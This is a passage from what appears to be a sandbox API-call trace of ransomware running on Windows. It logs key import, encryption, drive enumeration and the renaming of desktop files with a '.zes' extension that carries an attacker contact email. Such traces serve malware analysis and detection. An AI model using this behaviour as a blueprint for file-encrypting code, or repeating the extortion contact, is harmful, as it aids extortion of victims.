pbData=0x40ef828, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.223] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40ef88c | out: pbData=0x5a1318, pdwDataLen=0x40ef88c) returned 1 [0153.223] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.223] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x40ef890, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0153.223] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x40ef888, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x40ef888*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.223] GetProcessHeap () returned 0x520000 [0153.223] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0153.223] wsprintfA (in: param_1=0x40efad7, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0153.223] wsprintfW (in: param_1=0x40efee8, param_2="\\\\.\\%c:" | out: param_1="\\\\.\\C:") returned 6 [0153.223] wsprintfW (in: param_1=0x40efef8, param_2="%c:\\" | out: param_1="C:\\") returned 3 [0153.223] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.223] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x40efed8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x40efed8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.223] GetProcessHeap () returned 0x520000 [0153.223] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x34) returned 0x3f43588 [0153.223] wsprintfW (in: param_1=0x3f43588, param_2="%c:" | out: param_1="C:") returned 2 [0153.223] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0153.224] DeviceIoControl (in: hDevice=0x5f4, dwIoControlCode=0x560000, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x40eff08, nOutBufferSize=0x20, lpBytesReturned=0x40efedc, lpOverlapped=0x0 | out: lpOutBuffer=0x40eff08*, lpBytesReturned=0x40efedc*=0x20, lpOverlapped=0x0) returned 1 [0153.224] CloseHandle (hObject=0x5f4) returned 1 [0153.224] GetProcessHeap () returned 0x520000 [0153.224] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x3eb58a0 [0153.224] GetProcessHeap () returned 0x520000 [0153.224] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x3f54338 [0153.224] CryptGenRandom (in: hProv=0x534c10, dwLen=0x20, pbBuffer=0x3f54344 | out: pbBuffer=0x3f54344) returned 1 [0153.224] GetProcessHeap () returned 0x520000 [0153.224] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x3f54370 [0153.224] CryptGenRandom (in: hProv=0x534c10, dwLen=0x20, pbBuffer=0x3f5437c | out: pbBuffer=0x3f5437c) returned 1 [0153.224] GetProcessHeap () returned 0x520000 [0153.224] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0153.224] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0153.224] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40eff30 | out: pbData=0x5a1318, pdwDataLen=0x40eff30) returned 1 [0153.224] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.224] GetProcessHeap () returned 0x520000 [0153.224] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x580a68 [0153.224] GetProcessHeap () returned 0x520000 [0153.224] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x580af0 [0153.224] CryptImportKey (in: hProv=0x534c10, pbData=0x536998, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x40eff10 | out: phKey=0x40eff10*=0x3f43508) returned 1 [0153.224] CryptEncrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x580a68*, pdwDataLen=0x40eff14*=0x75, dwBufLen=0x80 | out: pbData=0x580a68*, pdwDataLen=0x40eff14*=0x80) returned 1 [0153.224] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.225] CryptImportKey (in: hProv=0x534c10, pbData=0x536998, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x40eff10 | out: phKey=0x40eff10*=0x3f43508) returned 1 [0153.225] CryptEncrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x580af0*, pdwDataLen=0x40eff14*=0x75, dwBufLen=0x80 | out: pbData=0x580af0*, pdwDataLen=0x40eff14*=0x80) returned 1 [0153.225] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0153.225] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0153.225] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40eff10 | out: pbData=0x5a1318, pdwDataLen=0x40eff10) returned 1 [0153.225] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16c60 [0153.225] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0153.225] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16c60, pdwDataLen=0x40eff10 | out: pbData=0x3f16c60, pdwDataLen=0x40eff10) returned 1 [0153.225] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16530 [0153.225] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0153.225] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16530, pdwDataLen=0x40eff10 | out: pbData=0x3f16530, pdwDataLen=0x40eff10) returned 1 [0153.225] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18258 [0153.225] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0153.225] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18258, pdwDataLen=0x40eff10 | out: pbData=0x3f18258, pdwDataLen=0x40eff10) returned 1 [0153.225] CryptDestroyKey (hKey=0x3f43508) returned 1 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10838) returned 0x3f688d8 [0153.225] GetProcessHeap () returned 0x520000 [0153.225] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x40f0020 [0153.226] wsprintfW (in: param_1=0x3f7890a, param_2=".[%08X].[%s].%s" | out: param_1=".[4B2E4630].[johncastle@msgsafe.io].zes") returned 39 [0153.226] GetProcessHeap () returned 0x520000 [0153.226] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10058) returned 0x3f89178 [0153.226] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4027f0, lpParameter=0x3f688d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0153.227] WaitForSingleObject (hHandle=0x5f4, dwMilliseconds=0xffffffff) returned 0x0 [0153.236] CloseHandle (hObject=0x5f4) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x40f0020 | out: hHeap=0x520000) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f688d8 | out: hHeap=0x520000) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18258 | out: hHeap=0x520000) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16530 | out: hHeap=0x520000) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16c60 | out: hHeap=0x520000) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0153.236] GetProcessHeap () returned 0x520000 [0153.236] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580a68 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580af0 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f54338 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f54370 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f43588 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3eb58a0 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443a8 | out: hHeap=0x520000) returned 1 [0153.237] GetProcessHeap () returned 0x520000 [0153.237] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443a8 [0153.237] PostMessageW (hWnd=0x5011c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1 [0153.247] GetProcessHeap () returned 0x520000 [0153.247] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18258 [0153.247] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.248] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18258, pdwDataLen=0x40eff30 | out: pbData=0x3f18258, pdwDataLen=0x40eff30) returned 1 [0153.248] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.248] GetProcessHeap () returned 0x520000 [0153.248] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f182e8 [0153.248] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.248] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f182e8, pdwDataLen=0x40eff30 | out: pbData=0x3f182e8, pdwDataLen=0x40eff30) returned 1 [0153.248] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.248] GetProcessHeap () returned 0x520000 [0153.248] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x3f30b20 [0153.248] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.248] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f30b20, pdwDataLen=0x40eff30 | out: pbData=0x3f30b20, pdwDataLen=0x40eff30) returned 1 [0153.248] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.248] wsprintfW (in: param_1=0x40eef0c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt") returned 56 [0153.248] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.248] GetProcessHeap () returned 0x520000 [0153.248] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f30b20 | out: hHeap=0x520000) returned 1 [0153.248] GetProcessHeap () returned 0x520000 [0153.248] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f182e8 | out: hHeap=0x520000) returned 1 [0153.248] GetProcessHeap () returned 0x520000 [0153.248] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18258 | out: hHeap=0x520000) returned 1 Thread: id = 152 os_tid = 0x8b8 [0153.229] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.229] GetProcessHeap () returned 0x520000 [0153.229] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5c) returned 0x575338 [0153.229] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa7e8cab0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName=".", cAlternateFileName="")) returned 0x3f43508 [0153.230] GetProcessHeap () returned 0x520000 [0153.230] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x575338 | out: hHeap=0x520000) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa7e8cab0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="..", cAlternateFileName="")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x254f7df0, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0x66f7cba0, ftLastAccessTime.dwHighDateTime=0x1d5e569, ftLastWriteTime.dwLowDateTime=0xa77dacd0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x7ea4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="0XH GEu.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="0XHGEU~1.ZES")) returned 1 [0153.230] GetProcessHeap () returned 0x520000 [0153.230] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x25e) returned 0x3f1b378 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a96f910, ftCreationTime.dwHighDateTime=0x1d5e325, ftLastAccessTime.dwLowDateTime=0x574b5d00, ftLastAccessTime.dwHighDateTime=0x1d5da85, ftLastWriteTime.dwLowDateTime=0xa7800e30, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x5c44, dwReserved0=0x0, dwReserved1=0xffff, cFileName="4D-19xSRnhVYoDBhN50S.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="4D-19X~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b76c7c0, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0xe8ad5fc0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0xa7800e30, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1734, dwReserved0=0x0, dwReserved1=0xffff, cFileName="5iwkI64gBz.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="5IWKI6~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd9a620, ftCreationTime.dwHighDateTime=0x1d5df20, ftLastAccessTime.dwLowDateTime=0x9b79a3a0, ftLastAccessTime.dwHighDateTime=0x1d5d7cf, ftLastWriteTime.dwLowDateTime=0xa7826f90, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x17474, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ahtoY.flv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="AHTOYF~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51e86f0, ftCreationTime.dwHighDateTime=0x1d5e3b0, ftLastAccessTime.dwLowDateTime=0x20be99a0, ftLastAccessTime.dwHighDateTime=0x1d5d954, ftLastWriteTime.dwLowDateTime=0xa784d0f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x14134, dwReserved0=0x0, dwReserved1=0xffff, cFileName="aisB0FsXovRbNO53dEZX.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="AISB0F~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6b1b60, ftCreationTime.dwHighDateTime=0x1d5dcf0, ftLastAccessTime.dwLowDateTime=0x15002f30, ftLastAccessTime.dwHighDateTime=0x1d5e065, ftLastWriteTime.dwLowDateTime=0xa7873250, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x120b4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bsikVZ.jpg.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="BSIKVZ~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c9350, ftCreationTime.dwHighDateTime=0x1d5dd00, ftLastAccessTime.dwLowDateTime=0x96f9f2e0, ftLastAccessTime.dwHighDateTime=0x1d5e5fc, ftLastWriteTime.dwLowDateTime=0xa78993b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x5a84, dwReserved0=0x0, dwReserved1=0xffff, cFileName="BU7M mcTpJ93bZk.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="BU7MMC~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c66490, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x4fe162a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0xa78bf510, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x44f4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bXlb_7naN_pfr0BxScfj.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="BXLB_7~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b9d27e0, ftCreationTime.dwHighDateTime=0x1d5de77, ftLastAccessTime.dwLowDateTime=0x826bde00, ftLastAccessTime.dwHighDateTime=0x1d5dcbb, ftLastWriteTime.dwLowDateTime=0xa78bf510, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xe404, dwReserved0=0x0, dwReserved1=0xffff, cFileName="DqWuUGnY.avi.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="DQWUUG~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17c4400, ftCreationTime.dwHighDateTime=0x1d5df23, ftLastAccessTime.dwLowDateTime=0x700ba990, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xa790b7d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x8ea4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="D_5K_QCaeZaqS1f_Oh_.avi.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="D_5K_Q~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9be0aa0, ftCreationTime.dwHighDateTime=0x1d5da10, ftLastAccessTime.dwLowDateTime=0x1222bd30, ftLastAccessTime.dwHighDateTime=0x1d5e6c5, ftLastWriteTime.dwLowDateTime=0xa7931930, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x7ff4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="h9 vL1qAQ0j.mp3.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="H9VL1Q~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a841b50, ftCreationTime.dwHighDateTime=0x1d5e104, ftLastAccessTime.dwLowDateTime=0x67fd1970, ftLastAccessTime.dwHighDateTime=0x1d5e6e4, ftLastWriteTime.dwLowDateTime=0xa7957a90, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xc124, dwReserved0=0x0, dwReserved1=0xffff, cFileName="j-fJcx.m4a.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="J-FJCX~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335a1ae0, ftCreationTime.dwHighDateTime=0x1d5e164, ftLastAccessTime.dwLowDateTime=0x61df73c0, ftLastAccessTime.dwHighDateTime=0x1d5d9c0, ftLastWriteTime.dwLowDateTime=0xa797dbf0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1bd4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="JTNWKHDQn2XuLRv.png.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="JTNWKH~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c7d930, ftCreationTime.dwHighDateTime=0x1d5d96b, ftLastAccessTime.dwLowDateTime=0x26a93000, ftLastAccessTime.dwHighDateTime=0x1d5dbc5, ftLastWriteTime.dwLowDateTime=0xa79a3d50, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x12be4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="K8FlFC.pdf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="K8FLFC~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c39980, ftCreationTime.dwHighDateTime=0x1d5d7c7, ftLastAccessTime.dwLowDateTime=0xdf1331b0, ftLastAccessTime.dwHighDateTime=0x1d5d9b6, ftLastWriteTime.dwLowDateTime=0xa79c9eb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xa684, dwReserved0=0x0, dwReserved1=0xffff, cFileName="l3CDAV63MRYTd8k.png.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="L3CDAV~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd706990, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x1e5a9d50, ftLastAccessTime.dwHighDateTime=0x1d5e55a, ftLastWriteTime.dwLowDateTime=0xa79f0010, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x3aa4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="MkSA.m4a.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="MKSAM4~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5775f30, ftCreationTime.dwHighDateTime=0x1d5db2d, ftLastAccessTime.dwLowDateTime=0xbe382010, ftLastAccessTime.dwHighDateTime=0x1d5deaf, ftLastWriteTime.dwLowDateTime=0xa7a3c2d0, 